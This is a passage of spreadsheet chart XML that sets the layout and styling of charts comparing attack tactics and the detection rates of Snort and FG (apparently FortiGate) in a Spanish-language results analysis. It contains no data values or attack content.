          <c:spPr>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados III -'!$DM$55</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:ser>
          <c:idx val="1"/>
          <c:order val="1"/>
          <c:tx>
            <c:v>FPs Manual Control Aplicaciones</c:v>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados III -'!$DN$55</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:axId val="273381358"/>
        <c:axId val="1645982232"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="273381358"/>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1645982232"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="1645982232"/>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273381358"/>
      </c:valAx>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="t"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:defRPr>
          </a:pPr>
        </a:p>
      </c:txPr>
    </c:legend>
    <c:plotVisOnly val="1"/>
  </c:chart>
</c:chartSpace>
</file>

<file path=xl/charts/chart89.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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:rPr>
              <a:t>% TÁCTICAS IMPLEMENTADAS (TÉCNICAS)</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:plotArea>
      <c:layout/>
      <c:pieChart>
        <c:varyColors val="1"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$E$16</c:f>
            </c:strRef>
          </c:tx>
          <c:dPt>
            <c:idx val="0"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="4285F4"/>
              </a:solidFill>
            </c:spPr>
          </c:dPt>
          <c:dPt>
            <c:idx val="1"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="EA4335"/>
              </a:solidFill>
            </c:spPr>
          </c:dPt>
          <c:dPt>
            <c:idx val="2"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="FBBC04"/>
              </a:solidFill>
            </c:spPr>
          </c:dPt>
          <c:dPt>
            <c:idx val="3"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="34A853"/>
              </a:solidFill>
            </c:spPr>
          </c:dPt>
          <c:dPt>
            <c:idx val="4"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="FF6D01"/>
              </a:solidFill>
            </c:spPr>
          </c:dPt>
          <c:dPt>
            <c:idx val="5"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="46BDC6"/>
              </a:solidFill>
            </c:spPr>
          </c:dPt>
          <c:dPt>
            <c:idx val="6"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="7BAAF7"/>
              </a:solidFill>
            </c:spPr>
          </c:dPt>
          <c:dPt>
            <c:idx val="7"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="F07B72"/>
              </a:solidFill>
            </c:spPr>
          </c:dPt>
          <c:dPt>
            <c:idx val="8"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="FCD04F"/>
              </a:solidFill>
            </c:spPr>
          </c:dPt>
          <c:dPt>
            <c:idx val="9"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="71C287"/>
              </a:solidFill>
            </c:spPr>
          </c:dPt>
          <c:dPt>
            <c:idx val="10"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="FF994D"/>
              </a:solidFill>
            </c:spPr>
          </c:dPt>
          <c:dPt>
            <c:idx val="11"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="7ED1D7"/>
              </a:solidFill>
            </c:spPr>
          </c:dPt>
          <c:dPt>
            <c:idx val="12"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="B3CEFB"/>
              </a:solidFill>
            </c:spPr>
          </c:dPt>
          <c:dPt>
            <c:idx val="13"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="F7B4AE"/>
              </a:solidFill>
            </c:spPr>
          </c:dPt>
          <c:dLbls>
            <c:showLegendKey val="0"/>
            <c:showVal val="0"/>
            <c:showCatName val="0"/>
            <c:showSerName val="0"/>
            <c:showPercent val="0"/>
            <c:showBubbleSize val="0"/>
            <c:showLeaderLines val="1"/>
          </c:dLbls>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$D$17:$D$30</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados IV - '!$E$17:$E$30</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:dLbls>
          <c:showLegendKey val="0"/>
          <c:showVal val="0"/>
          <c:showCatName val="0"/>
          <c:showSerName val="0"/>
          <c:showPercent val="0"/>
          <c:showBubbleSize val="0"/>
        </c:dLbls>
        <c:firstSliceAng val="0"/>
      </c:pieChart>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="r"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:defRPr>
          </a:pPr>
        </a:p>
      </c:txPr>
    </c:legend>
    <c:plotVisOnly val="1"/>
  </c:chart>
</c:chartSpace>
</file>

<file path=xl/charts/chart90.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000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:rPr>
              <a:t>% TÁCTICAS IMPLEMENTADAS (SUBTÉCNICAS)</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:plotArea>
      <c:layout/>
      <c:pieChart>
        <c:varyColors val="1"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$F$16</c:f>
            </c:strRef>
          </c:tx>
          <c:dPt>
            <c:idx val="0"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="4285F4"/>
              </a:solidFill>
            </c:spPr>
          </c:dPt>
          <c:dPt>
            <c:idx val="1"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="EA4335"/>
              </a:solidFill>
            </c:spPr>
          </c:dPt>
          <c:dPt>
            <c:idx val="2"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="FBBC04"/>
              </a:solidFill>
            </c:spPr>
          </c:dPt>
          <c:dPt>
            <c:idx val="3"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="34A853"/>
              </a:solidFill>
            </c:spPr>
          </c:dPt>
          <c:dPt>
            <c:idx val="4"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="FF6D01"/>
              </a:solidFill>
            </c:spPr>
          </c:dPt>
          <c:dPt>
            <c:idx val="5"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="46BDC6"/>
              </a:solidFill>
            </c:spPr>
          </c:dPt>
          <c:dPt>
            <c:idx val="6"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="7BAAF7"/>
              </a:solidFill>
            </c:spPr>
          </c:dPt>
          <c:dPt>
            <c:idx val="7"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="F07B72"/>
              </a:solidFill>
            </c:spPr>
          </c:dPt>
          <c:dPt>
            <c:idx val="8"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="FCD04F"/>
              </a:solidFill>
            </c:spPr>
          </c:dPt>
          <c:dPt>
            <c:idx val="9"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="71C287"/>
              </a:solidFill>
            </c:spPr>
          </c:dPt>
          <c:dPt>
            <c:idx val="10"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="FF994D"/>
              </a:solidFill>
            </c:spPr>
          </c:dPt>
          <c:dPt>
            <c:idx val="11"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="7ED1D7"/>
              </a:solidFill>
            </c:spPr>
          </c:dPt>
          <c:dPt>
            <c:idx val="12"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="B3CEFB"/>
              </a:solidFill>
            </c:spPr>
          </c:dPt>
          <c:dPt>
            <c:idx val="13"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="F7B4AE"/>
              </a:solidFill>
            </c:spPr>
          </c:dPt>
          <c:dLbls>
            <c:showLegendKey val="0"/>
            <c:showVal val="0"/>
            <c:showCatName val="0"/>
            <c:showSerName val="0"/>
            <c:showPercent val="0"/>
            <c:showBubbleSize val="0"/>
            <c:showLeaderLines val="1"/>
          </c:dLbls>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$D$17:$D$30</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados IV - '!$F$17:$F$30</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:dLbls>
          <c:showLegendKey val="0"/>
          <c:showVal val="0"/>
          <c:showCatName val="0"/>
          <c:showSerName val="0"/>
          <c:showPercent val="0"/>
          <c:showBubbleSize val="0"/>
        </c:dLbls>
        <c:firstSliceAng val="0"/>
      </c:pieChart>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="r"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:defRPr>
          </a:pPr>
        </a:p>
      </c:txPr>
    </c:legend>
    <c:plotVisOnly val="1"/>
  </c:chart>
</c:chartSpace>
</file>

<file path=xl/charts/chart9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000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:rPr>
              <a:t>% TÁCTICAS IMPLEMENTADAS (ATAQUES)</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:plotArea>
      <c:layout/>
      <c:pieChart>
        <c:varyColors val="1"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$G$16</c:f>
            </c:strRef>
          </c:tx>
          <c:dPt>
            <c:idx val="0"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="4285F4"/>
              </a:solidFill>
            </c:spPr>
          </c:dPt>
          <c:dPt>
            <c:idx val="1"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="EA4335"/>
              </a:solidFill>
            </c:spPr>
          </c:dPt>
          <c:dPt>
            <c:idx val="2"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="FBBC04"/>
              </a:solidFill>
            </c:spPr>
          </c:dPt>
          <c:dPt>
            <c:idx val="3"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="34A853"/>
              </a:solidFill>
            </c:spPr>
          </c:dPt>
          <c:dPt>
            <c:idx val="4"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="FF6D01"/>
              </a:solidFill>
            </c:spPr>
          </c:dPt>
          <c:dPt>
            <c:idx val="5"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="46BDC6"/>
              </a:solidFill>
            </c:spPr>
          </c:dPt>
          <c:dPt>
            <c:idx val="6"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="7BAAF7"/>
              </a:solidFill>
            </c:spPr>
          </c:dPt>
          <c:dPt>
            <c:idx val="7"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="F07B72"/>
              </a:solidFill>
            </c:spPr>
          </c:dPt>
          <c:dPt>
            <c:idx val="8"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="FCD04F"/>
              </a:solidFill>
            </c:spPr>
          </c:dPt>
          <c:dPt>
            <c:idx val="9"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="71C287"/>
              </a:solidFill>
            </c:spPr>
          </c:dPt>
          <c:dPt>
            <c:idx val="10"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="FF994D"/>
              </a:solidFill>
            </c:spPr>
          </c:dPt>
          <c:dPt>
            <c:idx val="11"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="7ED1D7"/>
              </a:solidFill>
            </c:spPr>
          </c:dPt>
          <c:dPt>
            <c:idx val="12"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="B3CEFB"/>
              </a:solidFill>
            </c:spPr>
          </c:dPt>
          <c:dPt>
            <c:idx val="13"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="F7B4AE"/>
              </a:solidFill>
            </c:spPr>
          </c:dPt>
          <c:dLbls>
            <c:showLegendKey val="0"/>
            <c:showVal val="0"/>
            <c:showCatName val="0"/>
            <c:showSerName val="0"/>
            <c:showPercent val="0"/>
            <c:showBubbleSize val="0"/>
            <c:showLeaderLines val="1"/>
          </c:dLbls>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$D$17:$D$30</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados IV - '!$G$17:$G$30</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:dLbls>
          <c:showLegendKey val="0"/>
          <c:showVal val="0"/>
          <c:showCatName val="0"/>
          <c:showSerName val="0"/>
          <c:showPercent val="0"/>
          <c:showBubbleSize val="0"/>
        </c:dLbls>
        <c:firstSliceAng val="0"/>
      </c:pieChart>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="r"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:defRPr>
          </a:pPr>
        </a:p>
      </c:txPr>
    </c:legend>
    <c:plotVisOnly val="1"/>
  </c:chart>
</c:chartSpace>
</file>

<file path=xl/charts/chart9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000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:rPr>
              <a:t>% DETECCIÓN DE FLUJOS CON ATAQUE SNORT VS FG</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:plotArea>
      <c:layout/>
      <c:barChart>
        <c:barDir val="col"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$L$11</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:srgbClr val="7F6000"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:dPt>
            <c:idx val="0"/>
          </c:dPt>
          <c:dPt>
            <c:idx val="1"/>
          </c:dPt>
          <c:dLbls>
            <c:numFmt formatCode="General" sourceLinked="1"/>
            <c:txPr>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:pPr lvl="0">
                  <a:defRPr>
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                  </a:defRPr>
                </a:pPr>
              </a:p>
            </c:txPr>
            <c:showLegendKey val="0"/>
            <c:showVal val="1"/>
            <c:showCatName val="0"/>
            <c:showSerName val="0"/>
            <c:showPercent val="0"/>
            <c:showBubbleSize val="0"/>
          </c:dLbls>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$K$13:$K$14</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados IV - '!$L$13:$L$14</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:ser>
          <c:idx val="1"/>
          <c:order val="1"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$M$11</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:srgbClr val="F1C232"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:dPt>
            <c:idx val="0"/>
          </c:dPt>
          <c:dPt>
            <c:idx val="1"/>
          </c:dPt>
          <c:dLbls>
            <c:dLbl>
              <c:idx val="1"/>
              <c:layout>
                <c:manualLayout>
                  <c:xMode val="edge"/>
                  <c:yMode val="edge"/>
                  <c:x val="0.6228190371255781"/>
                  <c:y val="0.23795557630508818"/>
                </c:manualLayout>
              </c:layout>
              <c:numFmt formatCode="General" sourceLinked="1"/>
              <c:txPr>
                <a:bodyPr/>
                <a:lstStyle/>
                <a:p>
                  <a:pPr lvl="0">
                    <a:defRPr>
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                    </a:defRPr>
                  </a:pPr>
                </a:p>
              </c:txPr>
              <c:showLegendKey val="0"/>
              <c:showVal val="1"/>
              <c:showCatName val="0"/>
              <c:showSerName val="0"/>
              <c:showPercent val="0"/>
              <c:showBubbleSize val="0"/>
            </c:dLbl>
            <c:numFmt formatCode="General" sourceLinked="1"/>
            <c:txPr>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:pPr lvl="0">
                  <a:defRPr>
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                  </a:defRPr>
                </a:pPr>
              </a:p>
            </c:txPr>
            <c:showLegendKey val="0"/>
            <c:showVal val="1"/>
            <c:showCatName val="0"/>
            <c:showSerName val="0"/>
            <c:showPercent val="0"/>
            <c:showBubbleSize val="0"/>
          </c:dLbls>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$K$13:$K$14</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados IV - '!$M$13:$M$14</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:ser>
          <c:idx val="2"/>
          <c:order val="2"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$N$11</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:srgbClr val="FFD966"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:dPt>
            <c:idx val="0"/>
          </c:dPt>
          <c:dPt>
            <c:idx val="1"/>
          </c:dPt>
          <c:dLbls>
            <c:dLbl>
              <c:idx val="1"/>
              <c:layout>
                <c:manualLayout>
                  <c:xMode val="edge"/>
                  <c:yMode val="edge"/>
                  <c:x val="0.6658000290164336"/>
                  <c:y val="0.5023200063529522"/>
                </c:manualLayout>
              </c:layout>
              <c:numFmt formatCode="General" sourceLinked="1"/>
              <c:txPr>
                <a:bodyPr/>
                <a:lstStyle/>
                <a:p>
                  <a:pPr lvl="0">
                    <a:defRPr>
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                    </a:defRPr>
                  </a:pPr>
                </a:p>
              </c:txPr>
              <c:showLegendKey val="0"/>
              <c:showVal val="1"/>
              <c:showCatName val="0"/>
              <c:showSerName val="0"/>
              <c:showPercent val="0"/>
              <c:showBubbleSize val="0"/>
            </c:dLbl>
            <c:numFmt formatCode="General" sourceLinked="1"/>
            <c:txPr>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:pPr lvl="0">
                  <a:defRPr>
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                  </a:defRPr>
                </a:pPr>
              </a:p>
            </c:txPr>
            <c:showLegendKey val="0"/>
            <c:showVal val="1"/>
            <c:showCatName val="0"/>
            <c:showSerName val="0"/>
            <c:showPercent val="0"/>
            <c:showBubbleSize val="0"/>
          </c:dLbls>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$K$13:$K$14</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados IV - '!$N$13:$N$14</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:ser>
          <c:idx val="3"/>
          <c:order val="3"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$O$11</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:srgbClr val="FFF2CC"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:dPt>
            <c:idx val="0"/>
          </c:dPt>
          <c:dPt>
            <c:idx val="1"/>
          </c:dPt>
          <c:dLbls>
            <c:dLbl>
              <c:idx val="0"/>
              <c:layout>
                <c:manualLayout>
                  <c:xMode val="edge"/>
                  <c:yMode val="edge"/>
                  <c:x val="0.27767991334725034"/>
                  <c:y val="0.9195061234386904"/>
                </c:manualLayout>
              </c:layout>
              <c:numFmt formatCode="General" sourceLinked="1"/>
              <c:txPr>
                <a:bodyPr/>
                <a:lstStyle/>
                <a:p>
                  <a:pPr lvl="0">
                    <a:defRPr>
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                    </a:defRPr>
                  </a:pPr>
                </a:p>
              </c:txPr>
              <c:showLegendKey val="0"/>
              <c:showVal val="1"/>
              <c:showCatName val="0"/>
              <c:showSerName val="0"/>
              <c:showPercent val="0"/>
              <c:showBubbleSize val="0"/>
            </c:dLbl>
            <c:numFmt formatCode="General" sourceLinked="1"/>
            <c:txPr>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:pPr lvl="0">
                  <a:defRPr>
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                  </a:defRPr>
                </a:pPr>
              </a:p>
            </c:txPr>
            <c:showLegendKey val="0"/>
            <c:showVal val="1"/>
            <c:showCatName val="0"/>
            <c:showSerName val="0"/>
            <c:showPercent val="0"/>
            <c:showBubbleSize val="0"/>
          </c:dLbls>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$K$13:$K$14</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados IV - '!$O$13:$O$14</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:ser>
          <c:idx val="4"/>
          <c:order val="4"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$P$11</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:schemeClr val="accent5"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:dPt>
            <c:idx val="1"/>
          </c:dPt>
          <c:dLbls>
            <c:numFmt formatCode="General" sourceLinked="1"/>
            <c:txPr>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:pPr lvl="0">
                  <a:defRPr/>
                </a:pPr>
              </a:p>
            </c:txPr>
            <c:showLegendKey val="0"/>
            <c:showVal val="1"/>
            <c:showCatName val="0"/>
            <c:showSerName val="0"/>
            <c:showPercent val="0"/>
            <c:showBubbleSize val="0"/>
          </c:dLbls>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$K$13:$K$14</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados IV - '!$P$13:$P$14</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:axId val="1336029179"/>
        <c:axId val="2093131240"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="1336029179"/>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2093131240"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="2093131240"/>
        <c:scaling>
          <c:orientation val="minMax"/>
          <c:max val="0.6"/>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336029179"/>
      </c:valAx>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="r"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:defRPr>
          </a:pPr>
        </a:p>
      </c:txPr>
    </c:legend>
    <c:plotVisOnly val="1"/>
  </c:chart>
</c:chartSpace>
</file>

<file path=xl/charts/chart9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000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:rPr>
              <a:t>% DETECCIÓN FLUJOS CON ATAQUE POR TÁCTICA - SNORT VS FG</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:plotArea>
      <c:layout>
        <c:manualLayout>
          <c:xMode val="edge"/>
          <c:yMode val="edge"/>
          <c:x val="0.03096926713947989"/>
          <c:y val="0.1650763358778626"/>
          <c:w val="0.8053264956002101"/>
          <c:h val="0.7849236641221373"/>
        </c:manualLayout>
      </c:layout>
      <c:radarChart>
        <c:radarStyle val="marker"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$L$38</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:ln cmpd="sng" w="38100">
              <a:solidFill>
                <a:srgbClr val="7F6000">
                  <a:alpha val="100000"/>
                </a:srgbClr>
              </a:solidFill>
              <a:prstDash val="solid"/>
            </a:ln>
          </c:spPr>
          <c:marker>
            <c:symbol val="none"/>
          </c:marker>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$K$39:$K$51</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados IV - '!$L$39:$L$51</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
          <c:smooth val="1"/>
        </c:ser>
        <c:ser>
          <c:idx val="1"/>
          <c:order val="1"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$M$38</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:ln cmpd="sng" w="38100">
              <a:solidFill>
                <a:srgbClr val="F1C232">
                  <a:alpha val="100000"/>
                </a:srgbClr>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:marker>
            <c:symbol val="none"/>
          </c:marker>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$K$39:$K$51</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados IV - '!$M$39:$M$51</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
          <c:smooth val="1"/>
        </c:ser>
        <c:ser>
          <c:idx val="2"/>
          <c:order val="2"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$N$38</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:ln cmpd="sng" w="38100">
              <a:solidFill>
                <a:srgbClr val="FFD966">
                  <a:alpha val="100000"/>
                </a:srgbClr>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:marker>
            <c:symbol val="none"/>
          </c:marker>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$K$39:$K$51</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados IV - '!$N$39:$N$51</c:f>
              <c:numCache/>
            </c:numRef>
